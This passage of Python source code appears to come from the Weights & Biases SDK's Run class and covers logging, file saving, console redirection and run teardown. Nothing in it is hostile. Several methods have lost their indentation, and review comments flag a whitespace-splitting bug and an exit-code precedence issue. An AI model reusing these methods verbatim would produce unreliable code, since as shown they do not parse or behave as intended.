self._label_probe_lines(doclines)
    # TODO: annotate jupyter Notebook class
    def _label_probe_notebook(self, notebook: Any) -> None:
        """Probe the first cell of a notebook for label comments (best-effort)."""
        logger.info("probe notebook")
        lines = None
        try:
            data = notebook.probe_ipynb()
            cell0 = data.get("cells", [])[0]
            lines = cell0.get("source")
            # kaggle returns a string instead of a list
            # NOTE(review): .split() breaks on ALL whitespace, not just
            # newlines — possibly splitlines() was intended; confirm.
            if isinstance(lines, str):
                lines = lines.split()
        except Exception as e:
            logger.info("Unable to probe notebook: {}".format(e))
            return
        if lines:
            self._label_probe_lines(lines)
    def display(self, height: int = 420, hidden: bool = False) -> bool:
        """Displays this run in jupyter.

        Args:
            height: Height of the embedded iframe, in pixels.
            hidden: If True, render collapsed behind a toggle button.

        Returns:
            True if HTML was displayed; False outside jupyter.
        """
        if self._settings._jupyter and ipython.in_jupyter():
            ipython.display_html(self.to_html(height, hidden))
            return True
        else:
            wandb.termwarn(".display() only works in jupyter environments")
            return False
def to_html(self, height: int = 420, hidden: bool = False) -> str:
"""Generates HTML containing an iframe displaying the current run."""
url = self._settings.run_url + "?jupyter=true"
style = f"border:none;width:100%;height:{height}px;"
prefix = ""
if hidden:
style += "display:none;"
prefix = ipython.toggle_button()
return prefix + f'<iframe src="{url}" style="{style}"></iframe>'
    def _repr_mimebundle_(
        self, include: Any = None, exclude: Any = None
    ) -> Dict[str, str]:
        # IPython rich-display hook: render the run as a hidden/toggleable iframe.
        return {"text/html": self.to_html(hidden=True)}
    def _config_callback(
        self,
        key: Union[Tuple[str, ...], str] = None,
        val: Any = None,
        data: Dict[str, object] = None,
    ) -> None:
        # Invoked by the Config object when values change; forwards the update
        # to the backend interface (no-op until a backend is attached).
        logger.info("config_cb %s %s %s", key, val, data)
        if not self._backend or not self._backend.interface:
            return
        self._backend.interface.publish_config(key=key, val=val, data=data)
    def _config_artifact_callback(
        self, key: str, val: Union[str, Artifact]
    ) -> Union[Artifact, public.Artifact]:
        """Resolve an artifact reference stored in config and mark it used.

        Args:
            key: Config key the artifact lives under (also passed as use_as).
            val: Either an artifact path string (format recognized by
                _is_artifact_string) or an Artifact object.

        Returns:
            The used artifact (wandb.Artifact or public.Artifact).
        """
        if _is_artifact_string(val):
            # this will never fail, but is required to make mypy happy
            assert isinstance(val, str)
            artifact_string, base_url = parse_artifact_string(val)
            overrides = {}
            if base_url is not None:
                # A base_url in the string means a different wandb instance.
                overrides = {"base_url": base_url}
                public_api = public.Api(overrides)
            else:
                public_api = self._public_api()
            artifact = public_api.artifact(name=artifact_string)
            # in the future we'll need to support using artifacts from
            # different instances of wandb. simplest way to do that is
            # likely to convert the retrieved public.Artifact to a wandb.Artifact
            return self.use_artifact(artifact, use_as=key)
        else:
            return self.use_artifact(val, use_as=key)
    def _set_config_wandb(self, key: str, val: Any) -> None:
        # Write a value under the reserved "_wandb" config namespace.
        self._config_callback(key=("_wandb", key), val=val)
    def _summary_update_callback(self, summary_record: SummaryRecord) -> None:
        # Invoked by the Summary object on mutation; forwards to the backend.
        if self._backend and self._backend.interface:
            self._backend.interface.publish_summary(summary_record)
def _summary_get_current_summary_callback(self) -> Dict[str, Any]:
if not self._backend or not self._backend.interface:
return {}
ret = self._backend.interface.communicate_get_summary()
if not ret:
return {}
return proto_util.dict_from_proto_list(ret.item)
    def _metric_callback(self, metric_record: MetricRecord) -> None:
        # Forward a metric definition to the backend, if one is attached.
        if self._backend and self._backend.interface:
            self._backend.interface._publish_metric(metric_record)
    def _datatypes_callback(self, fname: str) -> None:
        # Called when a data-type file is written under the run dir; publishes
        # it with the "now" policy. The name is glob-escaped because the file
        # layer treats entries as glob patterns.
        if not self._backend or not self._backend.interface:
            return
        files = dict(files=[(glob.escape(fname), "now")])
        self._backend.interface.publish_files(files)
def _visualization_hack(self, row: Dict[str, Any]) -> Dict[str, Any]:
# TODO(jhr): move visualize hack somewhere else
custom_charts = {}
for k in row:
if isinstance(row[k], Visualize):
config = {
"id": row[k].viz_id,
"historyFieldSettings": {"key": k, "x-axis": "_step"},
}
row[k] = row[k].value
self._config_callback(val=config, key=("_wandb", "viz", k))
elif isinstance(row[k], CustomChart):
custom_charts[k] = row[k]
custom_chart = row[k]
for k, custom_chart in custom_charts.items():
# remove the chart key from the row
# TODO: is this really the right move? what if the user logs
# a non-custom chart to this key?
row.pop(k)
# add the table under a different key
table_key = k + "_table"
row[table_key] = custom_chart.table
# add the panel
panel_config = custom_chart_panel_config(custom_chart, k, table_key)
self._add_panel(k, "Vega2", panel_config)
return row
    def _partial_history_callback(
        self, row: Dict[str, Any], step: int, commit: bool = False
    ) -> None:
        # Publish a (possibly partial) history row to the backend at `step`.
        if row:
            row = self._visualization_hack(row)
            # Stamp wall-clock time and run-relative runtime onto the row
            # unless the caller already provided them.
            row["_timestamp"] = int(row.get("_timestamp", time.time()))
            row["_runtime"] = int(row.get("_runtime", time.time() - self.start_time))

        if self._backend and self._backend.interface:
            not_using_tensorboard = len(wandb.patched["tensorboard"]) == 0
            # When tensorboard syncing is active the step is managed elsewhere,
            # so only publish the step when tensorboard is not patched.
            self._backend.interface.publish_partial_history(
                row, step, flush=commit, publish_step=not_using_tensorboard,
            )
    def _console_callback(self, name: str, data: str) -> None:
        # Forward captured console output (stream name + chunk) to the backend.
        # logger.info("console callback: %s, %s", name, data)
        if self._backend and self._backend.interface:
            self._backend.interface.publish_output(name, data)
    def _tensorboard_callback(
        self, logdir: str, save: bool = None, root_logdir: str = None
    ) -> None:
        # Notify the backend of a tensorboard logdir to sync.
        logger.info("tensorboard callback: %s, %s", logdir, save)
        save = True if save is None else save  # default: save event files
        if self._backend and self._backend.interface:
            self._backend.interface.publish_tbdata(logdir, save, root_logdir)
    def _set_library(self, library: _WandbSetup) -> None:
        # Reference to the global wandb setup/library singleton.
        self._wl = library
    def _set_backend(self, backend: "wandb.sdk.backend.backend.Backend") -> None:
        # Attach the backend; most callbacks no-op until this is set.
        self._backend = backend
    def _set_internal_run_interface(
        self,
        interface: Union[
            "wandb.sdk.interface.interface_queue.InterfaceQueue",
            "wandb.sdk.interface.interface_grpc.InterfaceGrpc",
        ],
    ) -> None:
        # Handle to the internal run interface (queue- or grpc-backed).
        self._internal_run_interface = interface
    def _set_reporter(self, reporter: Reporter) -> None:
        # Reporter used for problem/issue reporting (see .lib.reporting).
        self._reporter = reporter
    def _set_teardown_hooks(self, hooks: List[TeardownHook]) -> None:
        # Callbacks to run at teardown, tagged EARLY/LATE (see TeardownHook).
        self._teardown_hooks = hooks
    def _set_run_obj(self, run_obj: RunRecord) -> None:
        """Adopt the RunRecord returned by the backend, syncing config/summary state."""
        self._run_obj = run_obj
        self._entity = run_obj.entity
        self._project = run_obj.project

        # Grab the config from resuming
        if run_obj.config:
            c_dict = config_util.dict_no_value_from_proto_list(run_obj.config.update)
            # TODO: Windows throws a wild error when this is set...
            if "_wandb" in c_dict:
                del c_dict["_wandb"]
            # We update the config object here without triggering the callback
            self.config._update(c_dict, allow_val_change=True, ignore_locked=True)

        # Update the summary, this will trigger an un-needed graphql request :(
        if run_obj.summary:
            summary_dict = {}
            for orig in run_obj.summary.update:
                summary_dict[orig.key] = json.loads(orig.value_json)
            self.summary.update(summary_dict)
        # Resume history from where the server left off.
        self.history_step = self.starting_step

        # TODO: It feels weird to call this twice..
        sentry_set_scope(
            process_context="user", settings_dict=self.settings,
        )
    def _set_run_obj_offline(self, run_obj: RunRecord) -> None:
        # Offline-mode counterpart of _set_run_obj; only stores the record.
        self._run_obj_offline = run_obj
def _add_singleton(
self, data_type: str, key: str, value: Dict[Union[int, str], str]
) -> None:
"""Stores a singleton item to wandb config.
A singleton in this context is a piece of data that is continually
logged with the same value in each history step, but represented
as a single item in the config.
We do this to avoid filling up history with a lot of repeated uneccessary data
Add singleton can be called many times in one run and it will only be
updated when the value changes. The last value logged will be the one
persisted to the server.
"""
value_extra = {"type": data_type, "key": key, "value": value}
if data_type not in self.config["_wandb"]:
self.config["_wandb"][data_type] = {}
if data_type in self.config["_wandb"][data_type]:
old_value = self.config["_wandb"][data_type][key]
else:
old_value = None
if value_extra != old_value:
self.config["_wandb"][data_type][key] = value_extra
self.config.persist()
    def _log(
        self,
        data: Dict[str, Any],
        step: Optional[int] = None,
        commit: Optional[bool] = None,
    ) -> None:
        """Validate a log payload and route it into partial-history publishing.

        Args:
            data: Mapping of string keys to loggable values.
            step: Optional explicit history step; must be non-decreasing.
            commit: Whether to flush the history row. Defaults to True when
                step is None.

        Raises:
            ValueError: If data is not a mapping or has non-string keys.
            errors.LogMultiprocessError: If called (without the service) from
                a process other than the init process while in strict mode.
        """
        if not self._settings._require_service:
            # Without the wandb service, logging from a process other than
            # the one that called init is unsupported: warn (or raise in
            # strict mode) and drop the row.
            current_pid = os.getpid()
            if current_pid != self._init_pid:
                message = "log() ignored (called from pid={}, init called from pid={}). See: https://docs.wandb.ai/library/init#multiprocess".format(
                    current_pid, self._init_pid
                )
                if self._settings.strict:
                    wandb.termerror(message, repeat=False)
                    raise errors.LogMultiprocessError(
                        "log() does not support multiprocessing"
                    )
                wandb.termwarn(message, repeat=False)
                return

        # NOTE(review): `Mapping` must be collections.abc.Mapping — it is not
        # imported in this chunk; see the module import block.
        if not isinstance(data, Mapping):
            raise ValueError("wandb.log must be passed a dictionary")

        if any(not isinstance(key, str) for key in data.keys()):
            raise ValueError("Key values passed to `wandb.log` must be strings.")

        if step is not None:
            # if step is passed in when tensorboard_sync is used we honor the step passed
            # to make decisions about how to close out the history record, but will strip
            # this history later on in publish_history()
            using_tensorboard = len(wandb.patched["tensorboard"]) > 0
            if using_tensorboard:
                wandb.termwarn(
                    "Step cannot be set when using syncing with tensorboard. Please log your step values as a metric such as 'global_step'",
                    repeat=False,
                )
            if self.history_step > step:
                # Out-of-order step: warn and drop the row entirely.
                wandb.termwarn(
                    (
                        "Step must only increase in log calls. "
                        "Step {} < {}; dropping {}.".format(
                            step, self.history_step, data
                        )
                    )
                )
                return
            elif step > self.history_step:
                # Advancing the step: flush the accumulated (possibly empty)
                # row at the old step before moving forward.
                self._partial_history_callback(
                    {}, self.history_step, commit=True,
                )
                self.history_step = step
        elif commit is None:  # step is None and commit is None
            commit = True
        if commit:
            self._partial_history_callback(data, self.history_step, commit=True)
            self.history_step += 1
        else:
            self._partial_history_callback(data, self.history_step)
    def log(
        self,
        data: Dict[str, Any],
        step: Optional[int] = None,
        commit: Optional[bool] = None,
        sync: Optional[bool] = None,
    ) -> None:
        """Logs a dictionary of data to the current run's history.

        Use `wandb.log` to log data from runs, such as scalars, images, video,
        histograms, plots, and tables.

        See our [guides to logging](https://docs.wandb.ai/guides/track/log) for
        live examples, code snippets, best practices, and more.

        The most basic usage is `wandb.log({"train-loss": 0.5, "accuracy": 0.9})`.
        This will save the loss and accuracy to the run's history and update
        the summary values for these metrics.

        Visualize logged data in the workspace at [wandb.ai](https://wandb.ai),
        or locally on a [self-hosted instance](https://docs.wandb.ai/self-hosted)
        of the W&B app, or export data to visualize and explore locally, e.g. in
        Jupyter notebooks, with [our API](https://docs.wandb.ai/guides/track/public-api-guide).

        In the UI, summary values show up in the run table to compare single values across runs.
        Summary values can also be set directly with `wandb.run.summary["key"] = value`.

        Logged values don't have to be scalars. Logging any wandb object is supported.
        For example `wandb.log({"example": wandb.Image("myimage.jpg")})` will log an
        example image which will be displayed nicely in the W&B UI.
        See the [reference documentation](https://docs.wandb.com/library/reference/data_types)
        for all of the different supported types or check out our
        [guides to logging](https://docs.wandb.ai/guides/track/log) for examples,
        from 3D molecular structures and segmentation masks to PR curves and histograms.
        `wandb.Table`s can be used to log structured data. See our
        [guide to logging tables](https://docs.wandb.ai/guides/data-vis/log-tables)
        for details.

        Logging nested metrics is encouraged and is supported in the W&B UI.
        If you log with a nested dictionary like `wandb.log({"train":
        {"acc": 0.9}, "val": {"acc": 0.8}})`, the metrics will be organized into
        `train` and `val` sections in the W&B UI.

        wandb keeps track of a global step, which by default increments with each
        call to `wandb.log`, so logging related metrics together is encouraged.
        If it's inconvenient to log related metrics together
        calling `wandb.log({"train-loss": 0.5}, commit=False)` and then
        `wandb.log({"accuracy": 0.9})` is equivalent to calling
        `wandb.log({"train-loss": 0.5, "accuracy": 0.9})`.

        `wandb.log` is not intended to be called more than a few times per second.
        If you want to log more frequently than that it's better to aggregate
        the data on the client side or you may get degraded performance.

        Arguments:
            data: (dict) A dict of serializable python objects i.e `str`,
                `ints`, `floats`, `Tensors`, `dicts`, or any of the `wandb.data_types`.
            commit: (boolean, optional) Save the metrics dict to the wandb server
                and increment the step.  If false `wandb.log` just updates the current
                metrics dict with the data argument and metrics won't be saved until
                `wandb.log` is called with `commit=True`.
            step: (integer, optional) The global step in processing. This persists
                any non-committed earlier steps but defaults to not committing the
                specified step.
            sync: (boolean, True) This argument is deprecated and currently doesn't
                change the behaviour of `wandb.log`.

        Examples:
            For more and more detailed examples, see
            [our guides to logging](https://docs.wandb.com/guides/track/log).

            ### Basic usage
            <!--yeadoc-test:init-and-log-basic-->
            ```python
            import wandb
            wandb.init()
            wandb.log({'accuracy': 0.9, 'epoch': 5})
            ```

            ### Incremental logging
            <!--yeadoc-test:init-and-log-incremental-->
            ```python
            import wandb
            wandb.init()
            wandb.log({'loss': 0.2}, commit=False)
            # Somewhere else when I'm ready to report this step:
            wandb.log({'accuracy': 0.8})
            ```

            ### Histogram
            <!--yeadoc-test:init-and-log-histogram-->
            ```python
            import numpy as np
            import wandb
            # sample gradients at random from normal distribution
            gradients = np.random.randn(100, 100)
            wandb.init()
            wandb.log({"gradients": wandb.Histogram(gradients)})
            ```

            ### Image from numpy
            <!--yeadoc-test:init-and-log-image-numpy-->
            ```python
            import numpy as np
            import wandb
            wandb.init()
            examples = []
            for i in range(3):
                pixels = np.random.randint(low=0, high=256, size=(100, 100, 3))
                image = wandb.Image(pixels, caption=f"random field {i}")
                examples.append(image)
            wandb.log({"examples": examples})
            ```

            ### Image from PIL
            <!--yeadoc-test:init-and-log-image-pillow-->
            ```python
            import numpy as np
            from PIL import Image as PILImage
            import wandb
            wandb.init()
            examples = []
            for i in range(3):
                pixels = np.random.randint(low=0, high=256, size=(100, 100, 3), dtype=np.uint8)
                pil_image = PILImage.fromarray(pixels, mode="RGB")
                image = wandb.Image(pil_image, caption=f"random field {i}")
                examples.append(image)
            wandb.log({"examples": examples})
            ```

            ### Video from numpy
            <!--yeadoc-test:init-and-log-video-numpy-->
            ```python
            import numpy as np
            import wandb
            wandb.init()
            # axes are (time, channel, height, width)
            frames = np.random.randint(low=0, high=256, size=(10, 3, 100, 100), dtype=np.uint8)
            wandb.log({"video": wandb.Video(frames, fps=4)})
            ```

            ### Matplotlib Plot
            <!--yeadoc-test:init-and-log-matplotlib-->
            ```python
            from matplotlib import pyplot as plt
            import numpy as np
            import wandb
            wandb.init()
            fig, ax = plt.subplots()
            x = np.linspace(0, 10)
            y = x * x
            ax.plot(x, y)  # plot y = x^2
            wandb.log({"chart": fig})
            ```

            ### PR Curve
            ```python
            wandb.log({'pr': wandb.plots.precision_recall(y_test, y_probas, labels)})
            ```

            ### 3D Object
            ```python
            wandb.log({"generated_samples":
            [wandb.Object3D(open("sample.obj")),
                wandb.Object3D(open("sample.gltf")),
                wandb.Object3D(open("sample.glb"))]})
            ```

        Raises:
            wandb.Error: if called before `wandb.init`
            ValueError: if invalid data is passed

        """
        # `sync` is kept only for backward compatibility; warn and ignore it.
        if sync is not None:
            deprecate.deprecate(
                field_name=deprecate.Deprecated.run__log_sync,
                warning_message=(
                    "`sync` argument is deprecated and does not affect the behaviour of `wandb.log`"
                ),
            )
        self._log(data=data, step=step, commit=commit)
    def save(
        self,
        glob_str: Optional[str] = None,
        base_path: Optional[str] = None,
        policy: str = "live",
    ) -> Union[bool, List[str]]:
        """Ensure all files matching `glob_str` are synced to wandb with the policy specified.

        Matching files are symlinked into the run directory and a file-sync
        request is published to the backend.

        Arguments:
            glob_str: (string) a relative or absolute path to a unix glob or regular
                path.  If this isn't specified the method is a noop.
            base_path: (string) the base path to run the glob relative to
            policy: (string) one of `live`, `now`, or `end`
                - live: upload the file as it changes, overwriting the previous version
                - now: upload the file once now
                - end: only upload file when the run ends

        Returns:
            True for the legacy no-argument call, otherwise the list of
            symlinked file paths inside the run directory.
        """
        if glob_str is None:
            # noop for historical reasons, run.save() may be called in legacy code
            deprecate.deprecate(
                field_name=deprecate.Deprecated.run__save_no_args,
                warning_message=(
                    "Calling wandb.run.save without any arguments is deprecated."
                    "Changes to attributes are automatically persisted."
                ),
            )
            return True
        if policy not in ("live", "end", "now"):
            raise ValueError(
                'Only "live" "end" and "now" policies are currently supported.'
            )
        if isinstance(glob_str, bytes):
            glob_str = glob_str.decode("utf-8")
        if not isinstance(glob_str, str):
            raise ValueError("Must call wandb.save(glob_str) with glob_str a str")
        if base_path is None:
            if os.path.isabs(glob_str):
                # Absolute path without a base: flatten into the run dir.
                base_path = os.path.dirname(glob_str)
                wandb.termwarn(
                    (
                        "Saving files without folders. If you want to preserve "
                        "sub directories pass base_path to wandb.save, i.e. "
                        'wandb.save("/mnt/folder/file.h5", base_path="/mnt")'
                    )
                )
            else:
                base_path = "."
        wandb_glob_str = os.path.relpath(glob_str, base_path)
        if ".." + os.sep in wandb_glob_str:
            raise ValueError("globs can't walk above base_path")
        with telemetry.context(run=self) as tel:
            tel.feature.save = True
        if glob_str.startswith("gs://") or glob_str.startswith("s3://"):
            # Cloud storage is referenced, not uploaded; nothing to symlink.
            wandb.termlog(
                "%s is a cloud storage url, can't save file to wandb." % glob_str
            )
            return []
        files = glob.glob(os.path.join(self.dir, wandb_glob_str))
        warn = False
        if len(files) == 0 and "*" in wandb_glob_str:
            # Wildcard matched nothing yet; warn so users re-save after files appear.
            warn = True
        for path in glob.glob(glob_str):
            file_name = os.path.relpath(path, base_path)
            abs_path = os.path.abspath(path)
            wandb_path = os.path.join(self.dir, file_name)
            wandb.util.mkdir_exists_ok(os.path.dirname(wandb_path))
            # We overwrite symlinks because namespaces can change in Tensorboard
            if os.path.islink(wandb_path) and abs_path != os.readlink(wandb_path):
                os.remove(wandb_path)
                os.symlink(abs_path, wandb_path)
            elif not os.path.exists(wandb_path):
                os.symlink(abs_path, wandb_path)
            files.append(wandb_path)
        if warn:
            file_str = "%i file" % len(files)
            if len(files) > 1:
                file_str += "s"
            wandb.termwarn(
                (
                    "Symlinked %s into the W&B run directory, "
                    "call wandb.save again to sync new files."
                )
                % file_str
            )
        files_dict = dict(files=[(wandb_glob_str, policy)])
        if self._backend and self._backend.interface:
            self._backend.interface.publish_files(files_dict)
        return files
def restore(
self,
name: str,
run_path: Optional[str] = None,
replace: bool = False,
root: Optional[str] = None,
) -> Union[None, TextIO]:
return restore(name, run_path or self.path, replace, root or self.dir)
    def finish(self, exit_code: int = None, quiet: Optional[bool] = None) -> None:
        """Marks a run as finished, and finishes uploading all data.

        This is used when creating multiple runs in the same process. We automatically
        call this method when your script exits or if you use the run context manager.

        Teardown order matters here: EARLY hooks run before the backend is
        shut down, LATE hooks (e.g. logger detach) run after.

        Arguments:
            exit_code: Set to something other than 0 to mark a run as failed
            quiet: Set to true to minimize log output
        """
        if quiet is not None:
            self._quiet = quiet
        with telemetry.context(run=self) as tel:
            tel.feature.finish = True
        logger.info(f"finishing run {self.path}")
        # detach jupyter hooks / others that needs to happen before backend shutdown
        for hook in self._teardown_hooks:
            if hook.stage == TeardownStage.EARLY:
                hook.call()
        # Flush data, stop the console capture, and shut the backend down.
        self._atexit_cleanup(exit_code=exit_code)
        if self._wl and len(self._wl._global_run_stack) > 0:
            self._wl._global_run_stack.pop()
        # detach logger / others meant to be run after we've shutdown the backend
        for hook in self._teardown_hooks:
            if hook.stage == TeardownStage.LATE:
                hook.call()
        self._teardown_hooks = []
        module.unset_globals()
        # inform manager this run is finished
        manager = self._wl and self._wl._get_manager()
        if manager:
            manager._inform_finish(run_id=self.id)
def join(self, exit_code: int = None) -> None:
"""Deprecated alias for `finish()` - please use finish."""
deprecate.deprecate(
field_name=deprecate.Deprecated.run__join,
warning_message=(
"wandb.run.join() is deprecated, please use wandb.run.finish()."
),
)
self.finish(exit_code=exit_code)
# TODO(jhr): annotate this
def plot_table(self, vega_spec_name, data_table, fields, string_fields=None): # type: ignore
"""Creates a custom plot on a table.
Arguments:
vega_spec_name: the name of the spec for the plot
table_key: the key used to log the data table
data_table: a wandb.Table object containing the data to
be used on the visualization
fields: a dict mapping from table keys to fields that the custom
visualization needs
string_fields: a dict that provides values for any string constants
the custom visualization needs
"""
visualization = create_custom_chart(
vega_spec_name, data_table, fields, string_fields or {}
)
return visualization
def _add_panel(
self, visualize_key: str, panel_type: str, panel_config: dict
) -> None:
config = {
"panel_type": panel_type,
"panel_config": panel_config,
}
self._config_callback(val=config, key=("_wandb", "visualize", visualize_key))
def _redirect(
self,
stdout_slave_fd: Optional[int],
stderr_slave_fd: Optional[int],
console: SettingsConsole = None,
) -> None:
if console is None:
console = self._settings._console
logger.info("redirect: %s", console)
out_redir: redirect.RedirectBase
err_redir: redirect.RedirectBase
if console == SettingsConsole.REDIRECT:
logger.info("Redirecting console.")
out_redir = redirect.Redirect(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.Redirect(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
if os.name == "nt":
def wrap_fallback() -> None:
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
msg = (
"Tensorflow detected. Stream redirection is not supported "
"on Windows when tensorflow is imported. Falling back to "
"wrapping stdout/err."
)
wandb.termlog(msg)
self._redirect(None, None, console=SettingsConsole.WRAP)
add_import_hook("tensorflow", wrap_fallback)
elif console == SettingsConsole.WRAP:
logger.info("Wrapping output streams.")
out_redir = redirect.StreamWrapper(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.StreamWrapper(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
elif console == SettingsConsole.OFF:
return
else:
raise ValueError("unhandled console")
try:
out_redir.install()
err_redir.install()
self._out_redir = out_redir
self._err_redir = err_redir
logger.info("Redirects installed.")
except Exception as e:
print(e)
logger.error("Failed to redirect.", exc_info=e)
return
def _restore(self) -> None:
logger.info("restore")
# TODO(jhr): drain and shutdown all threads
if self._use_redirect:
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
return
if self.stdout_redirector:
self.stdout_redirector.restore()
if self.stderr_redirector:
self.stderr_redirector.restore()
if self._save_stdout:
sys.stdout = self._save_stdout
if self._save_stderr:
sys.stderr = self._save_stderr
logger.info("restore done")
    def _atexit_cleanup(self, exit_code: int = None) -> None:
        """Finish the run on process exit: flush, report status, shut down.

        Idempotent — the second and later calls are no-ops. Called both from
        `finish()` and from the atexit hook registered in `_console_start`.
        """
        if self._backend is None:
            logger.warning("process exited without backend configured")
            return
        if self._atexit_cleanup_called:
            return
        self._atexit_cleanup_called = True
        # NOTE(review): precedence makes this parse as
        # `(exit_code or self._hooks.exit_code) if self._hooks else 0`,
        # so an explicit exit_code is discarded whenever no hooks are
        # installed — confirm this is intended before relying on it.
        exit_code = exit_code or self._hooks.exit_code if self._hooks else 0
        logger.info(f"got exitcode: {exit_code}")
        if exit_code == 0:
            # Cleanup our resume file on a clean exit
            if os.path.exists(self._settings.resume_fname):
                os.remove(self._settings.resume_fname)
        self._exit_code = exit_code
        report_failure = False
        try:
            self._on_finish()
        except KeyboardInterrupt as ki:
            if wandb.wandb_agent._is_running():
                raise ki
            wandb.termerror("Control-C detected -- Run data was not synced")
            if not self._settings._jupyter:
                os._exit(-1)
        except Exception as e:
            if not self._settings._jupyter:
                report_failure = True
            self._console_stop()
            self._backend.cleanup()
            logger.error("Problem finishing run", exc_info=e)
            wandb.termerror("Problem finishing run")
            traceback.print_exception(*sys.exc_info())
        else:
            self._on_final()
        finally:
            # Hard-exit only after the exception handler had a chance to
            # stop the console and clean the backend.
            if report_failure:
                os._exit(-1)
def _console_start(self) -> None:
logger.info("atexit reg")
self._hooks = ExitHooks()
self._hooks.hook()
manager = self._wl and self._wl._get_manager()
if not manager:
# NB: manager will perform atexit hook like behavior for outstanding runs
atexit.register(lambda: self._atexit_cleanup())
if self._use_redirect:
# setup fake callback
self._redirect_cb = self._console_callback
output_log_path = os.path.join(self.dir, filenames.OUTPUT_FNAME)
self._output_writer = filesystem.CRDedupedFile(open(output_log_path, "wb"))
self._redirect(self._stdout_slave_fd, self._stderr_slave_fd)
def _console_stop(self) -> None:
self._restore()
if self._output_writer:
self._output_writer.close()
self._output_writer = None
def _on_init(self) -> None:
if self._backend and self._backend.interface:
logger.info("communicating current version")
self._check_version = self._backend.interface.communicate_check_version(
current_version=wandb.__version__
)
logger.info(f"got version response {self._check_version}")
def _on_start(self) -> None:
self._header(
self._check_version, settings=self._settings, printer=self._printer
)
if self._settings.save_code and self._settings.code_dir is not None:
self.log_code(self._settings.code_dir)
# TODO(wandb-service) RunStatusChecker not supported yet (WB-7352)
if self._backend and self._backend.interface and not self._settings._offline:
self._run_status_checker = RunStatusChecker(self._backend.interface)
self._console_start()
self._on_ready()
    def _on_attach(self) -> None:
        """Event triggered when run is attached to another run.

        Records the `attach` telemetry feature, then performs the same
        readiness work as a fresh start via `_on_ready`.
        """
        with telemetry.context(run=self) as tel:
            tel.feature.attach = True
        self._on_ready()
    def _on_ready(self) -> None:
        """Event triggered when run is ready for the user."""
        # start reporting any telemetry changes
        self._telemetry_obj_active = True
        self._telemetry_flush()
        # object is about to be returned to the user, don't let them modify it
        self._freeze()
    def _on_finish(self) -> None:
        """Flush remaining data, publish exit, and wait for the backend to drain."""
        trigger.call("on_finished")
        # populate final import telemetry
        with telemetry.context(run=self) as tel:
            self._telemetry_imports(tel.imports_finish)
        if self._run_status_checker:
            self._run_status_checker.stop()
        # make sure all uncommitted history is flushed
        self._partial_history_callback(
            {}, self.history_step, commit=True,
        )
        self._console_stop()  # TODO: there's a race here with jupyter console logging
        if self._backend and self._backend.interface:
            # telemetry could have changed, publish final data
            self._telemetry_flush()
            # TODO: we need to handle catastrophic failure better
            # some tests were timing out on sending exit for reasons not clear to me
            self._backend.interface.publish_exit(self._exit_code)
        print("")
        self._footer_exit_status_info(
            self._exit_code, settings=self._settings, printer=self._printer
        )
        # Poll until the backend reports that all data has been uploaded,
        # surfacing file-pusher progress to the terminal as we wait.
        while not (self._poll_exit_response and self._poll_exit_response.done):
            if self._backend and self._backend.interface:
                self._poll_exit_response = (
                    self._backend.interface.communicate_poll_exit()
                )
                logger.info(f"got exit ret: {self._poll_exit_response}")
                self._footer_file_pusher_status_info(
                    self._poll_exit_response, printer=self._printer,
                )
            time.sleep(0.1)
        if self._backend and self._backend.interface:
            self._sampled_history = (
                self._backend.interface.communicate_sampled_history()
            )
            self._final_summary = self._backend.interface.communicate_get_summary()
        if self._backend:
            self._backend.cleanup()
        if self._run_status_checker:
            self._run_status_checker.join()
def _on_final(self) -> None:
self._footer(
self._sampled_history,
self._final_summary,
self._poll_exit_response,
self._check_version,
self._reporter,
self._quiet,
settings=self._settings,
printer=self._printer,
)
def _save_job_spec(self) -> None:
envdict = dict(python="python3.6", requirements=[],)
varsdict = {"WANDB_DISABLE_CODE": "True"}
source = dict(
git="git@github.com:wandb/examples.git", branch="master", commit="bbd8d23",
)
execdict = dict(
program="train.py",
directory="keras-cnn-fashion",
envvars=varsdict,
args=[],
)
configdict = (dict(self._config),)
artifactsdict = dict(dataset="v1",)
inputdict = dict(config=configdict, artifacts=artifactsdict,)
job_spec = {
"kind": "WandbJob",
"version": "v0",
"environment": envdict,
"source": source,
"exec": execdict,
"input": inputdict,
}
s = json.dumps(job_spec, indent=4)
spec_filename = filenames.JOBSPEC_FNAME
with open(spec_filename, "w") as f:
print(s, file=f)
self.save(spec_filename)
    def define_metric(
        self,
        name: str,
        step_metric: Union[str, wandb_metric.Metric, None] = None,
        step_sync: bool = None,
        hidden: bool = None,
        summary: str = None,
        goal: str = None,
        overwrite: bool = None,
        **kwargs: Any,
    ) -> wandb_metric.Metric:
        """Define metric properties which will later be logged with `wandb.log()`.

        Arguments:
            name: Name of the metric.
            step_metric: Independent variable associated with the metric.
            step_sync: Automatically add `step_metric` to history if needed.
                Defaults to True if step_metric is specified.
            hidden: Hide this metric from automatic plots.
            summary: Specify aggregate metrics added to summary.
                Supported aggregations: "min,max,mean,best,last,none"
                Default aggregation is `copy`
                Aggregation `best` defaults to `goal`==`minimize`
            goal: Specify direction for optimizing the metric.
                Supported directions: "minimize,maximize"

        Returns:
            A metric object is returned that can be further specified.

        Raises:
            wandb.Error: on empty name, wrong argument types, a glob `*`
                anywhere but the name's suffix, or an unknown summary/goal.
        """
        if not name:
            raise wandb.Error("define_metric() requires non-empty name argument")
        for k in kwargs:
            wandb.termwarn("Unhandled define_metric() arg: {}".format(k))
        # Accept a Metric object in place of its name.
        if isinstance(step_metric, wandb_metric.Metric):
            step_metric = step_metric.name
        for arg_name, arg_val, exp_type in (
            ("name", name, str),
            ("step_metric", step_metric, str),
            ("step_sync", step_sync, bool),
            ("hidden", hidden, bool),
            ("summary", summary, str),
            ("goal", goal, str),
            ("overwrite", overwrite, bool),
        ):
            # NOTE: type checking is broken for isinstance and str
            if arg_val is not None and not isinstance(arg_val, exp_type):
                arg_type = type(arg_val).__name__
                raise wandb.Error(
                    "Unhandled define_metric() arg: {} type: {}".format(
                        arg_name, arg_type
                    )
                )
